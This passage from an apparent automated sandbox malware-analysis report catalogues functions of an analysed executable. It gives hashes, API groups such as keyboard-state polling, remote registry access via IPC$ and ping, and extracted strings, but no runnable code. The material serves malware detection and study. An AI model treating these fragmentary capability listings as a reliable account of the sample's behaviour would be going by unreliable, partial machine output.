                                                                                                                    • Opcode Fuzzy Hash: 0882505c88ed3b00aae6e4629277f07059bb2b253e5c1484f821cf4c8a59efc7
                                                                                                                    • Instruction Fuzzy Hash: 62A19422B0864243EA26BB1DD4946B9E761FFA6784F804035CF8D03A69DF3DE955CB90
                                                                                                                    Function 00007FF7BB7E1504 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 163windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                    • String ID: P
                                                                                                                    • API String ID: 1268354404-3110715001
                                                                                                                    • Opcode ID: 02435e4ac2fd25411414f443f70b9a64b2fb5eec06818f208819b822860aaaf9
                                                                                                                    • Instruction ID: 90d4d4d57a8fcb56b2ec4b60ba2e1b80c93524fb91b88d9a23cc918bdd24b37d
                                                                                                                    • Opcode Fuzzy Hash: 02435e4ac2fd25411414f443f70b9a64b2fb5eec06818f208819b822860aaaf9
                                                                                                                    • Instruction Fuzzy Hash: F961E435A186018AEB14AF6DD450679A794FFAAB98F900536DF0E43B7CDF3CE4508790
                                                                                                                    Function 00007FF7BB8634E4 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 149COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LoadStringwprintf
                                                                                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                    • API String ID: 3297454147-2391861430
                                                                                                                    • Opcode ID: 31c5b23564cdfe61f8d669abd9ab3ad79c4f4694b43ce296d1458ee3b9400a01
                                                                                                                    • Instruction ID: ee5b2a9374ba98af058fdab87bf755b9b948671dbad63e8714f4efc4aafa5dde
                                                                                                                    • Opcode Fuzzy Hash: 31c5b23564cdfe61f8d669abd9ab3ad79c4f4694b43ce296d1458ee3b9400a01
                                                                                                                    • Instruction Fuzzy Hash: FD716F22A18A4296EB40EB6DD4404E9A364FF69744FC01032EF5E476BDDF7CE516C790
                                                                                                                    Function 00007FF7BB84C034 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 124registryshareCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue
                                                                                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                    • API String ID: 3030280669-22481851
                                                                                                                    • Opcode ID: a4a03563eba47bf7a6bc45b00431da315f02e209d49ab1ef43027d618f4c2dd1
                                                                                                                    • Instruction ID: d0624dff49f100349d0c6c660cb790ba459381b8f2ea2e847fb198cedde1da58
                                                                                                                    • Opcode Fuzzy Hash: a4a03563eba47bf7a6bc45b00431da315f02e209d49ab1ef43027d618f4c2dd1
                                                                                                                    • Instruction Fuzzy Hash: 4451C322618A8285EB50EFADE8841E9A7A4FFA5384F800032EF4D47A7DDF78D555CB50
                                                                                                                    Function 00007FF7BB88AD1C Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 100windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$CreateMessageObjectSend$AttributesCompatibleDeleteDestroyLayeredLongMovePixelSelectStock
                                                                                                                    • String ID: static
                                                                                                                    • API String ID: 3821898125-2160076837
                                                                                                                    • Opcode ID: 2ad0c9b06366bd18a744c10cd610a20c9196bc34b39a8e3022a1d8394ddcf546
                                                                                                                    • Instruction ID: 80d1ad45aa1771e3371fa13b65ee7ed89e4e489c0472851ba20408126a73313a
                                                                                                                    • Opcode Fuzzy Hash: 2ad0c9b06366bd18a744c10cd610a20c9196bc34b39a8e3022a1d8394ddcf546
                                                                                                                    • Instruction Fuzzy Hash: BE417F3260878187EB609F29E84879AB361FB99790F905235DF9D43BA8CF3CE455CB50
                                                                                                                    Function 00007FF7BB863E20 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 97fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove
                                                                                                                    • String ID: :$\$\??\%s
                                                                                                                    • API String ID: 3827137101-3457252023
                                                                                                                    • Opcode ID: c042ec0e4a157b4915e6cbee2efc7bd563a20e0e85c4cf7d435b60959deae5d8
                                                                                                                    • Instruction ID: e2d12750d2ad0bdf4ddad85a2e134ec3227d25e6c9b573c2aad44947a4c02c7e
                                                                                                                    • Opcode Fuzzy Hash: c042ec0e4a157b4915e6cbee2efc7bd563a20e0e85c4cf7d435b60959deae5d8
                                                                                                                    • Instruction Fuzzy Hash: E841822160868385E720AB2DE8046FDA3A0FF96798F841135DE4D47AACDF7CD655C760
                                                                                                                    Function 00007FF7BB857BA0 Relevance: 16.6, APIs: 11, Instructions: 106keyboardCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: State$Async$Keyboard
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 541375521-0
                                                                                                                    • Opcode ID: 0d5fea19e654a2244c488208034703c69de1b6555bf9c6d80bb1d0db3dd32864
                                                                                                                    • Instruction ID: 739312a07b9c64245cccca68787825b074b45b9e3e511d2ccf599b6559e4c221
                                                                                                                    • Opcode Fuzzy Hash: 0d5fea19e654a2244c488208034703c69de1b6555bf9c6d80bb1d0db3dd32864
                                                                                                                    • Instruction Fuzzy Hash: AE419565D0C7C155FB71AB6C94847B9AA90FB27744F888039CF8A035E9CE1DB8A483B1
                                                                                                                    Function 00007FF7BB872A18 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 174networkfileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Icmp$CleanupCloseCreateEchoFileHandleSendStartupgethostbynameinet_addr
                                                                                                                    • String ID: 5$Ping
                                                                                                                    • API String ID: 1486594354-1972892582
                                                                                                                    • Opcode ID: 50c9766b147798dbf883b68baece8b13dfb7140da160f784641b179a8359557b
                                                                                                                    • Instruction ID: 6eee132f34d3fcef68a57f381a57becfe8b7e1f985b628298782b01761fd4612
                                                                                                                    • Opcode Fuzzy Hash: 50c9766b147798dbf883b68baece8b13dfb7140da160f784641b179a8359557b
                                                                                                                    • Instruction Fuzzy Hash: 7C714C62A08A4182EA10AF6ED49437DA7A0FFA6B94F818432DF4D477B9CF7CD4508760
                                                                                                                    Function 00007FF7BB81D504 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 117COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                    • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                                                                                    • API String ID: 3215553584-2617248754
                                                                                                                    • Opcode ID: e534a4a1f8a44b0f303199b2ab2fa91302a5b5a6dc95b4e8f2eb5eb0306d3d2b
                                                                                                                    • Instruction ID: e2d24945e3b6be39c7f05973d2abb83904f49e20d3ef2a8fcc01a862e71cbccf
                                                                                                                    • Opcode Fuzzy Hash: e534a4a1f8a44b0f303199b2ab2fa91302a5b5a6dc95b4e8f2eb5eb0306d3d2b
                                                                                                                    • Instruction Fuzzy Hash: 1D419C32A06B4199EB50DB2CE8417ED77A5FB69388F804135EF9C07B68DE38D029C390
                                                                                                                    Function 00007FF7BB8576D8 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 77windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleLoadMessageModuleStringwprintf
                                                                                                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                    • API String ID: 4007322891-4153970271
                                                                                                                    • Opcode ID: 1538dd0993c1f0be1c678023f24a10f35c888a11721d87e6110b8b553893543d
                                                                                                                    • Instruction ID: e8f1d7a364284b3d33d595d01fda6445f1e172621a33f72cff7adee54622482e
                                                                                                                    • Opcode Fuzzy Hash: 1538dd0993c1f0be1c678023f24a10f35c888a11721d87e6110b8b553893543d
                                                                                                                    • Instruction Fuzzy Hash: 9B316D32A18A8291DB10AB2CE4455ADA364FFA9B84FC05032EF4D036BDDF7CE515C790
                                                                                                                    Function 00007FF7BB84E08C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 76windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$CtrlParent$ClassName
                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                    • API String ID: 2573188126-1403004172
                                                                                                                    • Opcode ID: 69a74828d989a32538d8bf5129078fe410d4974b60f3824db6dc34d50caf6ec7
                                                                                                                    • Instruction ID: e0bf3a987c44d7ea6b75277ec6bdaaa7c9ae167d5f4f5db128f7e6de3d23f18b
                                                                                                                    • Opcode Fuzzy Hash: 69a74828d989a32538d8bf5129078fe410d4974b60f3824db6dc34d50caf6ec7
                                                                                                                    • Instruction Fuzzy Hash: 6831A421A0874181EA10AB2DD8541F9A361FFAAFA4F844231DFAD077E9DE3CE515C7A0
                                                                                                                    Function 00007FF7BB85CA98 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 59networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: wcscpy$CleanupStartupgethostbynamegethostnameinet_ntoa
                                                                                                                    • String ID: 0.0.0.0
                                                                                                                    • API String ID: 2479661705-3771769585
                                                                                                                    • Opcode ID: c022dea36b0d6b041929f70b141b9e152a2f360cd32598783c827dc949a89afb
                                                                                                                    • Instruction ID: bdb8b93167443a510eefcdfd102e23fd53e9aa91c8b7899a2f6747cfeebd80c9
                                                                                                                    • Opcode Fuzzy Hash: c022dea36b0d6b041929f70b141b9e152a2f360cd32598783c827dc949a89afb
                                                                                                                    • Instruction Fuzzy Hash: CB217421A0854241EE24BB2DE4943B9A361BFA67C0FC04131DF8D076BDDE6CE5A4C7A1
                                                                                                                    Function 00007FF7BB890D7C Relevance: 15.2, APIs: 10, Instructions: 209windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemMenu$InfoWindow$CheckCountCtrlEnabledFocusLongMessagePostProcRadio
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2672075419-0
                                                                                                                    • Opcode ID: 5d448b6b5489ede48ca866054f3642e2458e9f5a6920a77f390562690e31932d
                                                                                                                    • Instruction ID: 77089a5884ee110ae9f0a2b4f8cd9b338ba630a5845ca427a99918744a587358
                                                                                                                    • Opcode Fuzzy Hash: 5d448b6b5489ede48ca866054f3642e2458e9f5a6920a77f390562690e31932d
                                                                                                                    • Instruction Fuzzy Hash: 08917336B0865289FB50AF7DD4447ADA3A1BB66B88F901035DF4D436ADCF39F42583A0
                                                                                                                    Function 00007FF7BB8592E4 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2156557900-0
                                                                                                                    • Opcode ID: f7d99cf07bea50fb16dd5d3cc311eaa5ea5dc55bf0c60a23a6c1e8e39f679243
                                                                                                                    • Instruction ID: 880890b530af6ca9e26ec3c26bd101bbd2afce46ff97fffd6f54b2e59eb8f34b
                                                                                                                    • Opcode Fuzzy Hash: f7d99cf07bea50fb16dd5d3cc311eaa5ea5dc55bf0c60a23a6c1e8e39f679243
                                                                                                                    • Instruction Fuzzy Hash: 82315334B0870286EB50BB2EA484639F2A1BB66750FD05439CE4A4767CDE3DFC6587A0
                                                                                                                    Function 00007FF7BB84F7F4 Relevance: 14.5, APIs: 2, Strings: 6, Instructions: 471COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                    • API String ID: 0-1603158881
                                                                                                                    • Opcode ID: 29975b3c2b9711d51f2a34939379774d20c8c5231b4f57784e2d79393856af5d
                                                                                                                    • Instruction ID: 425e74310340166dad9593da297424cf942486230b1c107aee1b6080a6c3a212
                                                                                                                    • Opcode Fuzzy Hash: 29975b3c2b9711d51f2a34939379774d20c8c5231b4f57784e2d79393856af5d
                                                                                                                    • Instruction Fuzzy Hash: E312C562B1864356EA68AB3CC8112F9E290BF76784FC44535DF1D462B8EF7CE564C2B0
                                                                                                                    Function 00007FF7BB87767C Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 231COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$Init$Clear
                                                                                                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$_NewEnum$get__NewEnum
                                                                                                                    • API String ID: 3467423407-1765764032
                                                                                                                    • Opcode ID: 871de457a4cca6ecbcb942d6ebb7545a7fd856d2b80f63c35a82625c2d3c5159
                                                                                                                    • Instruction ID: 382168332bb043396334ae574d5da61f2ef3d6f27eac1a849ec09a73b6084d98
                                                                                                                    • Opcode Fuzzy Hash: 871de457a4cca6ecbcb942d6ebb7545a7fd856d2b80f63c35a82625c2d3c5159
                                                                                                                    • Instruction Fuzzy Hash: 03A19136A0474186EB20AF6ED4406ADB7A0FBA9B98F844132DF4D03768DF3CD495C790
                                                                                                                    Function 00007FF7BB877054 Relevance: 13.9, APIs: 9, Instructions: 373COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
